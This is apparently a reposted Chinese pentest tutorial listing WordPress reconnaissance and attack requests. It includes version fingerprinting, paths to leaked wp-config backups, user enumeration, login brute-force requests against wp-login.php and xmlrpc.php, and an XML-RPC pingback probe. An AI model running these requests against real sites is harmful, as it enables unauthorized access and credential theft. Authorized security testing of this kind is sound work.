扫码领资料
获黑客教程
免费&进群
如果遇到使用 WordPress 的网站,您会怎么做,渗透思路和安全检测思路?
如何挖掘Wordpress网站的漏洞
如果您访问https://target.com并查看源代码,您将看到来自 WordPress 的主题和插件的链接。
或者你可以访问https://target.com/wp-login.php,它是 WordPress 登录管理页面
通过查看核心、插件和主题版本找到相关的CVE
如何找到wordpress版本
https://target.com/feed
https://target.com/?feed=rss2
如何找到插件版本
https://target.com/wp-content/plugins/PLUGINNAME/readme.txt
https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT
https://target.com/wp-content/plugins/PLUGINNAME/README.txt
https://target.com/wp-content/plugins/PLUGINNAME/README.TXT
如何找到主题版本
https://target.com/wp-content/themes/THEMENAME/style.css
https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)
如果您发现过时的核心/插件/主题,请在https://wpscan.com找到漏洞利用
查找日志文件
http://target.com/wp-content/debug.log
查找备份文件 wp-config
http://target.com/.wp-config.php.swp
http://target.com/wp-config.inc
http://target.com/wp-config.old
http://target.com/wp-config.txt
http://target.com/wp-config.html
http://target.com/wp-config.php.bak
http://target.com/wp-config.php.dist
http://target.com/wp-config.php.inc
http://target.com/wp-config.php.old
http://target.com/wp-config.php.save
http://target.com/wp-config.php.swp
http://target.com/wp-config.php.txt
http://target.com/wp-config.php.zip
http://target.com/wp-config.php.html
http://target.com/wp-config.php~
获取网站上的用户名
http://target.com/?author=1
或者
http://target.com/wp-json/wp/v2/users
http://target.com/?rest_route=/wp/v2/users
爆破后台账号密码
POST /wp-login.php HTTP/1.1
Host: target.com
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
或者
POST /xmlrpc.php HTTP/1.1
Host: target.com
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>BRUTEFORCE_IN_HERE</value></param>
</params>
</methodCall>
wordpress 中的 XSPA
POST /xmlrpc.php HTTP/1.1
Host: target.com
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://yourip:port</string></value>
</param><param>
<value>
<string>https://target.com></string>
</value>
</param></params>
</methodCall>
注册启用
http://example.com/wp-login.php?action=register
来源:HACK学习呀
声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权!否则需自行承担,本公众号及原作者不承担相应的后果
学习更多渗透技能!体验靶场实战练习
(hack视频资料及工具)
(部分展示)
往期推荐
看到这里了,点个“赞”、“再看”
原文始发于微信公众号(白帽子左一):渗透干货 | Wordpress网站渗透方法指南
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论